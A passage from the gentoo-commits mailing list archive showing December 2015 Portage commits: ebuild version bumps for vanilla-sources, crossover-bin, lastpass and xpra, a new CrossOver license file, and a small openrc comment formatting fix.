+   caps? ( sys-libs/libcap )
+   kerberos? ( virtual/krb5 )
+   ldap? ( net-nds/openldap )
+   lucene? ( >=dev-cpp/clucene-2.3 )
+   lzma? ( app-arch/xz-utils )
+   lz4? ( app-arch/lz4 )
+   mysql? ( virtual/mysql )
+   pam? ( virtual/pam )
+   postgres? ( dev-db/postgresql:* !dev-db/postgresql[ldap,threads] )
+   selinux? ( sec-policy/selinux-dovecot )
+   solr? ( net-misc/curl dev-libs/expat )
+   sqlite? ( dev-db/sqlite:* )
+   ssl? (
+   !libressl? ( dev-libs/openssl:0 )
+   libressl? ( dev-libs/libressl )
+   )
+   tcpd? ( sys-apps/tcp-wrappers )
+   textcat? ( app-text/libexttextcat )
+   vpopmail? ( net-mail/vpopmail )
+   zlib? ( sys-libs/zlib )
+   virtual/libiconv
+   dev-libs/icu:="
+
+RDEPEND="${DEPEND}
+   net-mail/mailbase"
+
+S=${WORKDIR}/${MY_P}
+
+pkg_setup() {
+   if use managesieve && ! use sieve; then
+   ewarn "managesieve USE flag selected but sieve USE flag 
unselected"
+   ewarn "sieve USE flag will be turned on"
+   fi
+  

[gentoo-commits] repo/gentoo:master commit in: sys-kernel/vanilla-sources/

2015-12-14 Thread Agostino Sarubbo
commit: 2eb6c7d20ef3d5403d5b1b954345105a99a0aa82
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:45:02 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:45:02 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=2eb6c7d2

sys-kernel/vanilla-sources: Automated version bump to 4.3.2 - remove old.

Package-Manager: portage-2.2.24
Signed-off-by: Agostino Sarubbo  gentoo.org>

 sys-kernel/vanilla-sources/Manifest | 2 +-
 .../{vanilla-sources-4.3.1.ebuild => vanilla-sources-4.3.2.ebuild}  | 0
 2 files changed, 1 insertion(+), 1 deletion(-)

diff --git a/sys-kernel/vanilla-sources/Manifest 
b/sys-kernel/vanilla-sources/Manifest
index 6f7e26f..e74ce49 100644
--- a/sys-kernel/vanilla-sources/Manifest
+++ b/sys-kernel/vanilla-sources/Manifest
@@ -15,4 +15,4 @@ DIST patch-3.2.73.xz 1494652 SHA256 
ea40b581e5c8841152eaeaef967e96b208eb8fc7b5c0
 DIST patch-3.4.110.xz 1293116 SHA256 
132362637b7ba272d58acbedb172a7233c238ec1d794af111af55ee8a406e12d SHA512 
fc3f95dbf831b8edf9626632983b2d38dc017ff9db8718a79c9c3f714d1114c4fc8c6673854218c5230b3f71667b735945f6f80ae11e424894570941e7431b4a
 WHIRLPOOL 
9f1ec18591c043ba103856d2667c776bebc3369aafcb27d75174aac9d7e00653c571b245dcc8aca735838117cab62178e7a2f63a616a594fc9a508e85a997cca
 DIST patch-4.1.14.xz 416352 SHA256 
c7903f02c7f1e00657d0b8f454f195ae1fe0ba3d9d4633d8e55c92a70d4a0619 SHA512 
dcce40f93c1ea3c9bc95feedb0b576c842faa9e2f08a3969cdf613b18283c11bf3c27898c6d2a929b1d04bbfd66dabc03b01c165fa6d704b3c5701abc195d7a1
 WHIRLPOOL 
0068e4e59985630319a6a581dfe4a47789c23c632b96af91ca5a3fda49e2153db8734d9c4f352e242fd4d596ffda490d2f75d3d9d51f1fa5c41f3807b1ac440b
 DIST patch-4.2.7.xz 241240 SHA256 
3b0a41fb370f2e8c4aa8e284b6f758bb79f6021f8a1d50a0c11caaf0b5ab8793 SHA512 
81fb9e1cc914920c55addbca182c0f6cef6fcc1105613606e13815f186ff2d6c19c3edeff17e597524fb7b003ac23f2ec62edf28048d3204913d798e34802c60
 WHIRLPOOL 
25e965dab7341481c5ebccdd1d2f41b700689bc241c521bd4723d7df55fca12d38c5c1779420ac361013da5df93d631fb5233a92d9a8756eb5ec158be7c8472c
-DIST patch-4.3.1.xz 39348 SHA256 
82caff48806796418f445d0a87698abedfaaccfdc7b63059166b788e0cfd144b SHA512 
840e93d795f8a07224de06628199d9c84e571db800d3f1d03fced7869e1d0be7c17d33f3451beef39a4eee480df6e8571cb53836dc29bc6059598d876589a64a
 WHIRLPOOL 
7782e07f1ea3389f369d045ae463d1972fcb76b39e5aa3a1683654924598622772baedde2f076f2abed59234824123fa3a7b12d9759a1a09a5eec850414961b0
+DIST patch-4.3.2.xz 39640 SHA256 
a96b8a4e90887dea82066b4d804ac193700c200b6c0075fecba0b691b0240a5e SHA512 
ee0619d885e3f36239014bd1cb325ab736dff2ccc0b5634f14cc8fa65fddff0f045d2aafce5d55b5812ee6cf005c2119ee736721683fe88a31d471414f577bb2
 WHIRLPOOL 
81ab6c74d33f6bc4b3fddc9b9a57aee72055e3cfc92b36a9d2c5b8eb8621f5af05c1c81e1eab61e4d7dc83ae9049fee5b321f72414ec319f13a1d7b3aa5b927c

diff --git a/sys-kernel/vanilla-sources/vanilla-sources-4.3.1.ebuild 
b/sys-kernel/vanilla-sources/vanilla-sources-4.3.2.ebuild
similarity index 100%
rename from sys-kernel/vanilla-sources/vanilla-sources-4.3.1.ebuild
rename to sys-kernel/vanilla-sources/vanilla-sources-4.3.2.ebuild



[gentoo-commits] repo/gentoo:master commit in: app-emulation/crossover-bin/

2015-12-14 Thread Richard Yao
commit: 9d99b8edc98958ba6c9c86386da41bbd7813bf50
Author: Richard Yao  gentoo  org>
AuthorDate: Mon Dec 14 16:44:58 2015 +
Commit: Richard Yao  gentoo  org>
CommitDate: Mon Dec 14 16:48:32 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=9d99b8ed

app-emulation/crossover-bin: Bump to 15.0.0

Package-Manager: portage-2.2.20.1
Signed-off-by: Richard Yao  gentoo.org>

 app-emulation/crossover-bin/Manifest   |   1 +
 .../crossover-bin/crossover-bin-15.0.0.ebuild  | 141 +
 2 files changed, 142 insertions(+)

diff --git a/app-emulation/crossover-bin/Manifest 
b/app-emulation/crossover-bin/Manifest
index 7e9b29d..824e758 100644
--- a/app-emulation/crossover-bin/Manifest
+++ b/app-emulation/crossover-bin/Manifest
@@ -8,3 +8,4 @@ DIST install-crossover-13.1.3.bin 58768110 SHA256 
3d16dbecec584a1d6155ddda6f62a5
 DIST install-crossover-13.2.0.bin 64625581 SHA256 
ef29ca8ca275e4fb6b7aadc2d3ee92b4dc7d582fab7d5cff5c775d23c75d SHA512 
1f582eeca8db02c15d98d519b2d24f65b8dcddd90ff270915a4e6dbd24e135b074c5a20dd824c3d8c8f35cef79610c02423b5558db205a6e80630f69191e051b
 WHIRLPOOL 
f8ce0628d961a567291981a238f03da6f5f7554d4d971a8b27fc34b67969a7061032b84325df1a8e38313415dcda3dab98acd6833b396e4f46a65427c9dc8c3e
 DIST install-crossover-14.0.3.bin 68080015 SHA256 
23f67221e4047b50f3250b29fae51086cce93529956d3885d149d5abddcc83a2 SHA512 
86855e112f5b5d7621e0d4c644abe570de0270e678dc9666482025c948733de02c66fcf67999079a8ba99537695b36d4fb61aee90a59c319edad5fb477a0f902
 WHIRLPOOL 
a0f26d06d2bb81063bcf78a474b9bf4732e9314fd886f430c1141bfce26ae09c297ff79087e5834474d87aa772a1f08a44791d24a3a83ff2baf24969885fe9b8
 DIST install-crossover-14.1.4.bin 68463678 SHA256 
9e51823fca911916755b1edca8673c69df4c6f3607b170d9b01e9d9143b4d4c7 SHA512 
2078d9e8fc10c526085aef0bfa0cedbcc1a96ec59ade934ea10e7f10062f1a58f5647e9aed59653d4a1253699a08e9ef6f01548010e960af24d0d3546549fb91
 WHIRLPOOL 
a9714f15de43acb2ab6fed91bb35ffdec832dc8fef0b9f75ed394ca18af8552b797b795fdc5bc108c7cf27ca432f932b1f4fe6b4d04d4d52dfaa06bfef083aca
+DIST install-crossover-15.0.0.bin 80995834 SHA256 
ac538e5568674e23f515b6725bb4cb8b17c516bc910c875d3ac7e45d69f7aff4 SHA512 
597262b760c7cfc3c42cdb0b846802c6c47d4fcd5af06b53d0c63c80e4890e14af8ff0eaaac74a08f4f5d55e166a480d199b185efe685f7c42abca3d62fc2a0d
 WHIRLPOOL 
18f5eb531ad32d27e4e2bea1f205593906ab0bcbc022f0963fd237101b26cb796f7f771ab5b7d57b126aea93627390fc55075611551109ad1ad98769a2711951

diff --git a/app-emulation/crossover-bin/crossover-bin-15.0.0.ebuild 
b/app-emulation/crossover-bin/crossover-bin-15.0.0.ebuild
new file mode 100644
index 000..9f37115
--- /dev/null
+++ b/app-emulation/crossover-bin/crossover-bin-15.0.0.ebuild
@@ -0,0 +1,141 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+PYTHON_COMPAT=( python2_7 )
+PYTHON_REQ_USE="threads"
+
+inherit python-single-r1 unpacker
+
+DESCRIPTION="Commercial version of app-emulation/wine with paid support."
+HOMEPAGE="http://www.codeweavers.com/products/crossover/;
+SRC_URI="https://media.codeweavers.com/pub/crossover/cxlinux/demo/install-crossover-${PV}.bin;
+
+LICENSE="CROSSOVER-3"
+SLOT="0"
+KEYWORDS="-* ~amd64 ~x86"
+IUSE="+capi +cups doc +gphoto2 +gsm +jpeg +lcms +ldap +mp3 +nls +openal 
+opengl +png +scanner +ssl +v4l"
+RESTRICT="bindist test"
+QA_FLAGS_IGNORED="opt/cxoffice/.*"
+QA_PRESTRIPPED="opt/cxoffice/lib/.*
+   opt/cxoffice/bin/cxburner
+   opt/cxoffice/bin/cxntlm_auth
+   opt/cxoffice/bin/wineserver
+   opt/cxoffice/bin/unrar
+   opt/cxoffice/bin/wine-preloader
+   opt/cxoffice/bin/cxdiag
+   opt/cxoffice/bin/cxgettext
+   opt/cxoffice/bin/wineloader
+   "
+S="${WORKDIR}"
+
+DEPEND="dev-lang/perl
+   app-arch/unzip
+   ${PYTHON_DEPS}"
+
+RDEPEND="${DEPEND}
+   !prefix? ( sys-libs/glibc )
+   >=dev-python/pygtk-2.10[${PYTHON_USEDEP}]
+   dev-python/dbus-python[${PYTHON_USEDEP}]
+   dev-util/desktop-file-utils
+   !app-emulation/crossover-office-pro-bin
+   !app-emulation/crossover-office-bin
+   capi? ( net-dialup/capi4k-utils )
+   cups? ( net-print/cups[abi_x86_32(-)] )
+   gsm? ( media-sound/gsm[abi_x86_32(-)] )
+   jpeg? ( virtual/jpeg[abi_x86_32(-)] )
+   lcms? ( media-libs/lcms:2 )
+   ldap? ( net-nds/openldap[abi_x86_32(-)] )
+   gphoto2? ( media-libs/libgphoto2[abi_x86_32(-)] )
+   mp3? ( >=media-sound/mpg123-1.5.0[abi_x86_32(-)] )
+   nls? ( sys-devel/gettext[abi_x86_32(-)] )
+   openal? ( media-libs/openal[abi_x86_32(-)] )
+   opengl? (
+   virtual/glu[abi_x86_32(-)]
+   virtual/opengl[abi_x86_32(-)]
+   )
+   png? ( media-libs/libpng:0[abi_x86_32(-)] )
+   scanner? ( media-gfx/sane-backends[abi_x86_32(-)] )
+   ssl? ( dev-libs/openssl:0[abi_x86_32(-)] )
+   v4l? ( media-libs/libv4l[abi_x86_32(-)] )
+   media-libs/alsa-lib[abi_x86_32(-)]
+   

[gentoo-commits] repo/gentoo:master commit in: licenses/

2015-12-14 Thread Richard Yao
commit: 9c8678ccc363d45b1d61bbe01614e9cfde7379b2
Author: Richard Yao  gentoo  org>
AuthorDate: Mon Dec 14 16:45:52 2015 +
Commit: Richard Yao  gentoo  org>
CommitDate: Mon Dec 14 16:48:20 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=9c8678cc

New license: CROSSOVER-3

Codeweavers made 2 changes between this and CROSSOVER-2, the latter of
which we requested:

1. They now claim to bundle copies of libxml2 and libxslt under
BSD-style licenses.
2. The section on deleting the software has been deleted.

This had 6 days on the list for comments and none were provided:

https://archives.gentoo.org/gentoo-dev/message/fd9e05bfe3401ce96dfaa9927f9ebcca

Signed-off-by: Richard Yao  gentoo.org>

 licenses/CROSSOVER-3 | 683 +++
 1 file changed, 683 insertions(+)

diff --git a/licenses/CROSSOVER-3 b/licenses/CROSSOVER-3
new file mode 100644
index 000..6906647
--- /dev/null
+++ b/licenses/CROSSOVER-3
@@ -0,0 +1,683 @@
+CrossOver Linux License Grant
+
+YOU REALLY WANT TO READ THIS, ESPECIALLY THE PART ABOUT
+THE MANDATORY CAR WASH FOR CODEWEAVERS EMPLOYEES...
+
+If you don't like this license grant:
+
+   a. Let us know, we'd appreciate the feedback.
+
+   b. Stop right now, and ask for a refund. We'll cheerfully do so.
+
+
+The main thing we want you to know:
+ This is a license for one user. The license is not necessarily for a
+specific user, or a specific computer, but it is for one person at a
+time. If you need to support more than one person, please contact us
+for volume pricing and site licensing.  We do offer educational
+discounts.
+
+< Start of Formal License Grant >---
+
+   1. License. The software accompanying this License (hereinafter "Software"),
+  regardless of the media on which it is distributed, are licensed to you
+  by CodeWeavers ("VENDOR"). You own the medium on which the Software is
+  recorded, but VENDOR and VENDOR's Licensors (referred to collectively as
+  "VENDOR") retain title to the Software and related documentation. You
+  may:
+
+ a. run the Software on any computer, so long as no more than one
+person per license is ever using the Software at any one time.
+
+ b. transfer all your license rights in the Software, the backup copy
+of the Software, the related documentation and a copy of this
+License to another party, provided the other party reads and agrees
+to accept the terms and conditions of this License.
+
+
+   2. Free Software. The Software contained in this product includes some
+  components of Free Software, including software from the Wine Project,
+  and the MojoSetup setup software.
+
+  The Wine project is licensed under terms of the GNU Lesser General Public
+  License, which is included below as Appendix A. The best source for the
+  Wine source code is the main Wine web page at http://www.winehq.org.
+
+  Japanese fonts are included under the Wada Laboratory public domain
+  license found at
+  http://sourceforge.jp/projects/ume-font/wiki/UmeFontLicence
+
+  MojoSetup and its dependent projects are all licensed under BSD
+  style licenses.  The best place for that code is also
+  www.icculus.org.
+
+  We also use or include static copies of the following projects:
+libxml2, libxslt- BSD-style
+xml-dom, xml-namespacesupport,  - Artistic or GPL license
+xml-regexp, xml-sax
+
+  We also use the htmltextview.py library by Gustavor Carneiro, which
+  is licensed under the LGPL.  The source code was available to us at:
+http://people.gnome.org/~gjc/htmltextview.py
+
+  Portions of this software are copyright © 2009. The FreeType
+  Project (www.freetype.org).  All rights reserved.
+
+  In each case, we use them unmodified and strongly recommend that
+  anyone wishing source code for these projects find and visit the
+  respective project home page.
+
+  We are deeply grateful to the authors of all of these software projects
+  for allowing us to use their software.
+
+  We include source code with each CD purchase of CrossOver. Current
+  source code for Free Software contained within CrossOver products is also
+  generally available at our web site, www.codeweavers.com. However,
+  individuals wishing to obtain source directly from us will be cheerfully
+  provided with a copy of any Free Software source upon request. We reserve
+  the right to charge a nominal processing fee for transmission of the
+  source code. Send such requests to i...@codeweavers.com.
+
+  CodeWeavers strongly believes in the Free Software movement. We believe
+  that the spirit of this movement makes it important for you to be able to
+  obtain these components for 

[gentoo-commits] proj/openrc:master commit in: src/includes/

2015-12-14 Thread William Hubbs
commit: 065f034059d7ca26bbb985158c5d361ff75df186
Author: William Hubbs  gmail  com>
AuthorDate: Mon Dec 14 17:37:39 2015 +
Commit: William Hubbs  gentoo  org>
CommitDate: Mon Dec 14 17:37:39 2015 +
URL:https://gitweb.gentoo.org/proj/openrc.git/commit/?id=065f0340

format fix

 src/includes/helpers.h | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/src/includes/helpers.h b/src/includes/helpers.h
index 4352858..aaf4e3a 100644
--- a/src/includes/helpers.h
+++ b/src/includes/helpers.h
@@ -1,7 +1,7 @@
 /*
-  helpers.h
-  This is private to us and not for user consumption
-*/
+ * helpers.h
+ * This is private to us and not for user consumption
+ */
 
 /*
  * Copyright (c) 2007-2009 Roy Marples 



[gentoo-commits] repo/gentoo:master commit in: app-admin/lastpass/

2015-12-14 Thread Robin H. Johnson
commit: 00309c45af7f470ea9604f52d8a4bdeae56442a6
Author: Robin H. Johnson  gentoo  org>
AuthorDate: Mon Dec 14 21:33:42 2015 +
Commit: Robin H. Johnson  gentoo  org>
CommitDate: Mon Dec 14 21:34:09 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=00309c45

app-admin/lastpass: Fixup chrome/chromium install destinations.

Package-Manager: portage-2.2.24

 app-admin/lastpass/Manifest   |  2 +-
 app-admin/lastpass/lastpass-3.2.16.ebuild | 33 +++
 2 files changed, 17 insertions(+), 18 deletions(-)

diff --git a/app-admin/lastpass/Manifest b/app-admin/lastpass/Manifest
index d9d86df..6b2dbc1 100644
--- a/app-admin/lastpass/Manifest
+++ b/app-admin/lastpass/Manifest
@@ -1,3 +1,3 @@
-DIST lastpass-3.2.16.tar.bz2 1621919 SHA256 
c06fd97e74298c5e7d698b2c8cffce7d79f0c45126daeb27bca91d3403fd893c SHA512 
ed77f3ca979d84021e27088a5d1d7e0b102f6ce15f675a7b99810e88760844182b8597670bbe45c9436b42889597c8c421d1acb6abe24085bbd2623b7984d37d
 WHIRLPOOL 
192d332348db9ad68a5e63441e17c0ef954de058376f110dcd05dfe261d54f1c9a179a9c647dc9d5090ffefe8af68a9dbe446dea7a1fb46b1f6c2e458752417d
 DIST lp_linux-3.2.16.xpi 6328266 SHA256 
e06364ce631f436246cfca19ff24a2483bc459a5e31178f2c6acd57c1f408f81 SHA512 
343d0763f25c31fb7dbde2c9aa19d797431ee9f7bb1f8ae220fd4cac2cc8f439813d92ecb432047f5889967eca7bd4197a7f2725fc52669d022c9f44b7d4945e
 WHIRLPOOL 
5b64cdf371b9ff9ac46030393b22fd92c4fa6493947f47d91a2f44c7019ffcfe137456398c2991aee5cbc45bf95b39d90a6a423f6a2e284ac88d2d75d2f8
 DIST lpchrome_linux-3.2.16.crx 5310273 SHA256 
58ec7c7dfa735c5d052b0ca253f85654fd381952533a4a2b125d3abb88e77d39 SHA512 
a7d3198ace665bcbbe0a7bdc9dcb4dc165aaa39214df798fe28930d3cc340976a476b8afc4f19af1acc6cbbe61feff8dfa5cc6c2b4c6d4a04b0377752ce1ca54
 WHIRLPOOL 
9b281945cd8603516e11a9a2f4869622d6783a56670253cdcc4a51a7ddae84a1a5297956d491b4e17e449a01acf6e8a4e3cc0a8b494f973078e617fe041ed615
+DIST lplinux-3.2.16.tar.bz2 1621919 SHA256 
c06fd97e74298c5e7d698b2c8cffce7d79f0c45126daeb27bca91d3403fd893c SHA512 
ed77f3ca979d84021e27088a5d1d7e0b102f6ce15f675a7b99810e88760844182b8597670bbe45c9436b42889597c8c421d1acb6abe24085bbd2623b7984d37d
 WHIRLPOOL 
192d332348db9ad68a5e63441e17c0ef954de058376f110dcd05dfe261d54f1c9a179a9c647dc9d5090ffefe8af68a9dbe446dea7a1fb46b1f6c2e458752417d

diff --git a/app-admin/lastpass/lastpass-3.2.16.ebuild 
b/app-admin/lastpass/lastpass-3.2.16.ebuild
index c5047a6..98e3245 100644
--- a/app-admin/lastpass/lastpass-3.2.16.ebuild
+++ b/app-admin/lastpass/lastpass-3.2.16.ebuild
@@ -8,11 +8,13 @@ inherit eutils
 DESCRIPTION="Online password manager and form filler that makes web browsing 
easier and more secure"
 HOMEPAGE="https://lastpass.com/misc_download2.php;
 # sadly, upstream has no versioned distfiles
-MAINDISTFILE=lplinux.tar.bz2
+DIST_MAIN=lplinux-${PV}.tar.bz2
+DIST_CRX=lpchrome_linux-${PV}.crx # Use by both firefox+chrome/chromimum code
+DIST_XPI=lp_linux-${PV}.xpi
 SRC_URI="
-   https://lastpass.com/${MAINDISTFILE} -> ${P}.tar.bz2
-   https://lastpass.com/lpchrome_linux.crx -> lpchrome_linux-${PV}.crx
-   firefox? ( https://lastpass.com/lp_linux.xpi -> lp_linux-${PV}.xpi )"
+   https://lastpass.com/lplinux.tar.bz2 -> ${DIST_MAIN}
+   https://lastpass.com/lpchrome_linux.crx -> ${DIST_CRX}
+   firefox? ( https://lastpass.com/lp_linux.xpi -> ${DIST_XPI} )"
 
 LICENSE="LastPass"
 SLOT="0"
@@ -43,11 +45,11 @@ QA_PREBUILT="
 S="${WORKDIR}"
 
 src_unpack() {
-   unpack ${P}.tar.bz2
+   unpack ${DIST_MAIN}
mkdir -p "${S}"/crx || die
# bug #524864: strip Chrome CRX header
# otherwise the unzip warning can be fatal in some cases
-   dd bs=306 skip=1 if="${DISTDIR}"/lpchrome_linux-${PV}.crx 
of="${T}"/lpchrome_linux.zip 2>/dev/null || die
+   dd bs=306 skip=1 if="${DISTDIR}"/${DIST_CRX} 
of="${T}"/lpchrome_linux.zip 2>/dev/null || die
unzip -qq -o "${T}"/lpchrome_linux.zip -d "${S}"/crx || die
 }
 
@@ -85,23 +87,20 @@ src_install() {
}
EOF
 
-   if use chromium; then
-   insinto /etc/chromium/policies/managed
+   for d in \
+   $(usex chromium /etc/chromium '') \
+   $(usex chrome /etc/opt/chrome '') \
+   ; do
+   insinto ${d}/policies/managed
doins "${T}"/lastpass_policy.json
-   insinto /etc/opt/chrome/native-messaging-hosts/
+   insinto ${d}/native-messaging-hosts
doins "${T}"/com.lastpass.nplastpass.json
-   fi
-   if use chrome; then
-   insinto /etc/opt/chrome/policies/managed/
-   doins "${T}"/lastpass_policy.json
-   insinto /etc/chromium/native-messaging-hosts
-   doins "${T}"/com.lastpass.nplastpass.json
-   fi
+   done
 
if use firefox; then

d="$D/usr/$(get_libdir)/firefox/browser/extensions/supp...@lastpass.com"
mkdir -p $d || die
-   unzip -qq 

[gentoo-commits] repo/gentoo:master commit in: app-admin/lastpass/

2015-12-14 Thread Robin H. Johnson
commit: 98b9085a94480ad5c5951f99b49848bc182429aa
Author: Gokturk Yuksek  binghamton  edu>
AuthorDate: Tue Nov  3 22:37:32 2015 +
Commit: Robin H. Johnson  gentoo  org>
CommitDate: Mon Dec 14 21:34:09 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=98b9085a

app-admin/lastpass: bump to 3.2.16 #550834 #551312

Bump app-admin/lastpass to 3.2.16. Upstream does not support versioned
tarballs, so remove the old version. Closes a bump request and a
checksum mismatch bug.

Also, add the missing build time dependency on app-arch/unzip.

Gentoo-Bug: https://bugs.gentoo.org/show_bug.cgi?id=550834
Gentoo-Bug: https://bugs.gentoo.org/show_bug.cgi?id=551312

Package-Manager: portage-2.2.20.1

 app-admin/lastpass/Manifest |  6 +++---
 ...astpass-3.1.61.ebuild => lastpass-3.2.16.ebuild} | 21 ++---
 2 files changed, 13 insertions(+), 14 deletions(-)

diff --git a/app-admin/lastpass/Manifest b/app-admin/lastpass/Manifest
index b2067e9..d9d86df 100644
--- a/app-admin/lastpass/Manifest
+++ b/app-admin/lastpass/Manifest
@@ -1,3 +1,3 @@
-DIST lp_linux.xpi 3965257 SHA256 
1d98b3649f51e5f08a16379a73791b7e85fa5fab35b3a6190860c900788c5dbc SHA512 
e39a6ada0e75dcb3bf943bce9b573bf8d22be7c07baf86f3651cbaaa5abcec7c31dd43341369b1fe562aff572befd1f15114ba030e6b9fb317bd476798d7b5e5
 WHIRLPOOL 
85f7eebc2f155d4beb7a1f69ef9d1e58508c76ac2807536d7a07885f395f342b218587199c9b57a77f9e54e75e1dfaf311341c16a59830c114283e542aa18767
-DIST lpchrome_linux.crx 4722909 SHA256 
511fd7968bb45ab1425ca9584873f4dbf0812b63c64a4e604796cb0a76849f3f SHA512 
01935a34a0be63b96556009cb50364df83599aeab6cad10d7e4b49af5a5acfeecf61171aa36f932901a42e2e0b58141e649d17525a259343fe9b2f287d413dc0
 WHIRLPOOL 
230f2c820d2cf8d3a937866c5c3dde8b7f05e37547180a4e666bc0bac592671f5c1d7bb84498d5bd930053e47ec80d75207dcaba1b71f307d1ea011d80e9e5f9
-DIST lplinux.tar.bz2 1523508 SHA256 
535fe4ce97a55f3baf9311962a7a4812ea7a32c8a545ee1e533c0794c665abf1 SHA512 
4433701df5a6c04bb914f3b342c458a28ff7cd232936f77dfec6ddd959060be1e8bf067b88e05d1c1ac69f63f1660c49c262f85515d6cf97188ea365f7bf309b
 WHIRLPOOL 
818f00fc43944b8eb1c0f4816e82fa06be69845d1d6a3eb8de453db1647e9bfdce0ff0812ea9c0fec64c904dce1cc1fa4c514a79ead2c5e98aeb7416a8a2fb41
+DIST lastpass-3.2.16.tar.bz2 1621919 SHA256 
c06fd97e74298c5e7d698b2c8cffce7d79f0c45126daeb27bca91d3403fd893c SHA512 
ed77f3ca979d84021e27088a5d1d7e0b102f6ce15f675a7b99810e88760844182b8597670bbe45c9436b42889597c8c421d1acb6abe24085bbd2623b7984d37d
 WHIRLPOOL 
192d332348db9ad68a5e63441e17c0ef954de058376f110dcd05dfe261d54f1c9a179a9c647dc9d5090ffefe8af68a9dbe446dea7a1fb46b1f6c2e458752417d
+DIST lp_linux-3.2.16.xpi 6328266 SHA256 
e06364ce631f436246cfca19ff24a2483bc459a5e31178f2c6acd57c1f408f81 SHA512 
343d0763f25c31fb7dbde2c9aa19d797431ee9f7bb1f8ae220fd4cac2cc8f439813d92ecb432047f5889967eca7bd4197a7f2725fc52669d022c9f44b7d4945e
 WHIRLPOOL 
5b64cdf371b9ff9ac46030393b22fd92c4fa6493947f47d91a2f44c7019ffcfe137456398c2991aee5cbc45bf95b39d90a6a423f6a2e284ac88d2d75d2f8
+DIST lpchrome_linux-3.2.16.crx 5310273 SHA256 
58ec7c7dfa735c5d052b0ca253f85654fd381952533a4a2b125d3abb88e77d39 SHA512 
a7d3198ace665bcbbe0a7bdc9dcb4dc165aaa39214df798fe28930d3cc340976a476b8afc4f19af1acc6cbbe61feff8dfa5cc6c2b4c6d4a04b0377752ce1ca54
 WHIRLPOOL 
9b281945cd8603516e11a9a2f4869622d6783a56670253cdcc4a51a7ddae84a1a5297956d491b4e17e449a01acf6e8a4e3cc0a8b494f973078e617fe041ed615

diff --git a/app-admin/lastpass/lastpass-3.1.61.ebuild 
b/app-admin/lastpass/lastpass-3.2.16.ebuild
similarity index 83%
rename from app-admin/lastpass/lastpass-3.1.61.ebuild
rename to app-admin/lastpass/lastpass-3.2.16.ebuild
index cae55ad..c5047a6 100644
--- a/app-admin/lastpass/lastpass-3.1.61.ebuild
+++ b/app-admin/lastpass/lastpass-3.2.16.ebuild
@@ -1,4 +1,4 @@
-# Copyright 1999-2014 Gentoo Foundation
+# Copyright 1999-2015 Gentoo Foundation
 # Distributed under the terms of the GNU General Public License v2
 # $Id$
 
@@ -10,9 +10,9 @@ HOMEPAGE="https://lastpass.com/misc_download2.php;
 # sadly, upstream has no versioned distfiles
 MAINDISTFILE=lplinux.tar.bz2
 SRC_URI="
-   https://lastpass.com/${MAINDISTFILE}
-   https://lastpass.com/lpchrome_linux.crx
-   firefox? ( https://lastpass.com/lp_linux.xpi )"
+   https://lastpass.com/${MAINDISTFILE} -> ${P}.tar.bz2
+   https://lastpass.com/lpchrome_linux.crx -> lpchrome_linux-${PV}.crx
+   firefox? ( https://lastpass.com/lp_linux.xpi -> lp_linux-${PV}.xpi )"
 
 LICENSE="LastPass"
 SLOT="0"
@@ -20,7 +20,7 @@ KEYWORDS="-* ~x86 ~amd64"
 IUSE="+chromium +firefox +chrome"
 RESTRICT="strip mirror" # We can't mirror it, but we can fetch it
 
-DEPEND=""
+DEPEND="app-arch/unzip"
 RDEPEND="
chrome? ( || (
www-client/google-chrome
@@ -43,11 +43,11 @@ QA_PREBUILT="
 S="${WORKDIR}"
 
 src_unpack() {
-   unpack ${MAINDISTFILE}
+   unpack ${P}.tar.bz2
mkdir -p "${S}"/crx || die
# bug #524864: strip Chrome CRX header
# otherwise the 

[gentoo-commits] repo/gentoo:master commit in: app-admin/lastpass/

2015-12-14 Thread Robin H. Johnson
commit: 32c83e782f87ee0f6c213d5d446243a653fc93c5
Author: Gokturk Yuksek  binghamton  edu>
AuthorDate: Mon Dec 14 00:06:39 2015 +
Commit: Robin H. Johnson  gentoo  org>
CommitDate: Mon Dec 14 00:06:39 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=32c83e78

app-admin/lastpass: add long description in metadata

Package-Manager: portage-2.2.20.1
RepoMan-Options: --force

 app-admin/lastpass/metadata.xml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/app-admin/lastpass/metadata.xml b/app-admin/lastpass/metadata.xml
index 566d3b2..b92bb91 100644
--- a/app-admin/lastpass/metadata.xml
+++ b/app-admin/lastpass/metadata.xml
@@ -12,7 +12,9 @@
 Proxied maintainer; set to assignee in all bugs
   
   
-   
+Lastpass is an online password manager, password generator, form
+filler and secure notes service.
+  
   
 Support for www-client/firefox
 Support for www-client/chromium



[gentoo-commits] repo/gentoo:master commit in: /

2015-12-14 Thread Robin H. Johnson
commit: 4b972edb4a20104b1408eeb06a1c33f5004e3cfc
Author: Robin H. Johnson  gentoo  org>
AuthorDate: Mon Dec 14 21:35:51 2015 +
Commit: Robin H. Johnson  gentoo  org>
CommitDate: Mon Dec 14 21:35:51 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4b972edb

Merge remote-tracking branch 'github/pr/473'

 app-admin/lastpass/metadata.xml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)



[gentoo-commits] repo/gentoo:master commit in: x11-wm/xpra/

2015-12-14 Thread Michael Weber
commit: ff7c03604cae1bffbf96adba0f7dd2b5601049ef
Author: Michael Weber  gentoo  org>
AuthorDate: Mon Dec 14 20:34:21 2015 +
Commit: Michael Weber  gentoo  org>
CommitDate: Mon Dec 14 20:34:21 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=ff7c0360

x11-wm/xpra: Version bump.

Package-Manager: portage-2.2.26

 x11-wm/xpra/Manifest   |   1 +
 x11-wm/xpra/xpra-0.15.9.ebuild | 115 +
 2 files changed, 116 insertions(+)

diff --git a/x11-wm/xpra/Manifest b/x11-wm/xpra/Manifest
index 251926a..289d860 100644
